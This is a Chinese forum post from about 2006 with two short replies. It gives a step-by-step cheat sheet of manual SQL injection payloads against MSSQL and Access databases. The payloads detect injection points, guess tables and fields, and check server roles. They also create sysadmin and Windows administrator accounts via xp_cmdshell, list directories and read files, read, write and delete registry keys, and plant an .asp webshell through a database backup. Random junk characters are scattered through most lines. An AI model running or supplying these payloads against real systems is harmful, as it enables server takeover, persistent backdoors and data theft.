社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3867阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 M.h)]S>  
  2.初步判断是否是mssql ;and user>0 {5ujKQOcR  
|"7^9(  
  3.注入参数是字符'and [查询条件] and ''=' QasUgZ  
N*k`'T  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' -Qt>yzD3  
Z#n!=k TTm  
  5.判断数据库系统 D~KEjz!bQ  
hXvg<Rf  
  ;and (select count(*) from sysobjects)>0 mssql ?5%0zMC  
m{U+aqAQK  
  ;and (select count(*) from msysobjects)>0 access JWu^7}@~=  
^>g7Kg"0  
B/*`u  
r%*UU4xvB  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 0a#2 Lo  
]cz*k/*0  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 U1+X!&OCp  
Bf&,ACOf  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 *?k~n9n5U  
uC _&?  
  9.(1)猜字段的ascii值(access) mOLP77(o  
Cst:5m0!  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 t+R8{9L-  
-Qs4 s  
  (2)猜字段的ascii值(mssql) R'#[}s  
:r<uH6x|  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 zi^T?<t  
M_o<6C  
  10.测试权限结构(mssql) )PM&x   
rPK)=[MZ  
Z3ucJH/)V  
Ab]`*h\U  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- wKjL}1.k  
MjO.s+I  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- rtl|zCst  
OygR5s +  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- jIZpv|t)  
[V\0P,l  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ls(lL\  
%fS__Tb#u  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- /$'R!d5r  
|.A#wjF9  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- cU,]^/0Y  
3Mvm'T:[  
  ;and 1=(select IS_MEMBER('db_owner'));-- REyk,s2"6  
@O;gKFx  
{X=gjQ9  
T.1*32cX  
  11.添加mssql和系统的帐户 gFJ. p  
aY^_+&&G  
  ;exec master.dbo.sp_addlogin username;-- dS7?[[pg9  
  ;exec master.dbo.sp_password null,username,password;-- D ^ mfWJS  
jQAK ?7':=  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 8 |2QJ  
mL!)(Bb  
  ;exec master.dbo.xp_cmdshell 'net user username password \r_-gn'1b  
O-rHfIxY  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- +doZnU,  
29]T:I1d[  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- H /E.R[\+x  
"=7y6bM  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- xLfx/&2  
k79" xyXX  
ogt<vng  
R %QgOz3`  
  12.(1)遍历目录 9{gY|2R_  
6}aIb.j  
  ;create table dirs(paths varchar(100), id int) xWY%-CWY.  
95.m^~5  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' jU1([(?"  
Z J:h]  
  ;and (select top 1 paths from dirs)>0 D49yV`  
O|t@p=]  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) j@jaFsX |  
faqOGAb  
nf,R+oX  
7*bUy)UZ  
  (2)遍历目录 icq!^5BzL  
oDY $F%  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- d ] J5c  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 y{>d&M|  
C;#-2^h  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 alQMPQVin  
ac8+?FpK #  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 +|#lUXC  
t'msgC6=>u  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 WJefg  
h J*2q"  
-L;sv0  
?0%yDq1_  
  13.mssql中的存储过程 t5r,3x!E  
#0K122oY  
  xp_regenumvalues 注册表根键, 子键 M2UF3xD   
jf_xm=n  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 i%jti6z$Hr  
h n:  
  xp_regread 根键,子键,键值名 ,>6s~'  
^_6.*Mvx  
  ;exec xp_regread sEpY&6*  
Z=VAjJ;i[  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Igowz7  
K `|%-k+D  
  xp_regwrite 根键,子键, 值名, 值类型, 值 UY@^KT]  
-+^E5  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 zZ rUS'8  
clE_a?  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 {Kn:>l$*7  
1P (5+9"s  
  xp_regdeletevalue 根键,子键,值名 aS ]bTYJ'  
z8HOig?  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ,>H(l$n  
Y?cdm}:Ou  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 eko$c,&jY  
-6wjc rTD  
 V6opV&  
nVkPYeeT  
  14.mssql的backup创建webshell J2rw4L  
4bV&U=  
  use model tOn 6  
~RlsgtX"  
  create table cmd(str image); 4/6?wX  
HYd&.*41rE  
  insert into cmd(str) values (''); 6Fp}U  
A~MAaw!YE  
  backup database model to disk='c:\l.asp'; |y,%dFNLf  
j<H5i}  
mB.ybrig  
X rBe41  
  15.mssql内置函数 gP&G63^  
@FC|1=+  
  ;and (select @@version)>0 获得Windows的版本号 N3J T[7  
(XF"ckma  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa  58S>B'  
uc>u=kEue  
  ;and (select user_name())>0 爆当前系统的连接用户 in>Os@e#  
s L;  
  ;and (select db_name())>0 得到当前连接的数据库 >A'Q9Tia;  
azEN_oUV  
"pQFIV,  
]yc&ffe%  
  16.简洁的webshell ="~yD[S  
x4b.^5"`:  
  use model (jR7D"I  
%9bf^LyD  
  create table cmd(str image); 6V[ce4a%  
ccUI\!TD{/  
  insert into cmd(str) values (''); Y9YE:s  
kU*Fif  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八